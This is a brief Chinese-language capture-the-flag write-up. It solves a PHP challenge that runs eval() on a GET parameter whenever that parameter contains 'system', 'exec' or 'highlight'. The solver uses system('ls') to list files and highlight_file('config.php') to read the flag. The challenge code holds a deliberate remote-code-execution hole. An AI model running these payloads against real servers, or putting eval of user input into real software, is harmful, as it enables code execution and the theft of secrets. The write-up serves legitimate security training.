<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(preg_match("/system|exec|highlight/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
题目要求我们利用 system、exec、highlight才能执行eval()。
构造
?c=system('ls');
发现存在两个文件
构造
highlight_file() 函数对文件进行语法高亮显示。
?c=highlight_file(’config.php‘);
得到flag